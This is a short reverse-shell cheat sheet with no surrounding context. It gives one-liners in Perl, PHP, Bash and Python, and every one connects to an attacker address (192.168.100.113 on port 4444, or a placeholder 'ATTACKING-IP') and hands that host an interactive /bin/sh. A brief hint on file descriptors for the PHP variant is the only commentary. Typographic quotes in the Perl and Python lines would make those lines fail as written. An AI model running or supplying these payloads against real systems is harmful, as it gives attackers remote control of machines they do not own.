perl -e ‘use Socket;$i=”192.168.100.113″;$p=4444;
socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));
if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);
open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’

php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");'
(Assumes TCP uses file descriptor 3. If it doesn't work, try 4,5, or 6)

bash -i >& /dev/tcp/192.168.100.113/4444 0>&1

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.100.113”,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’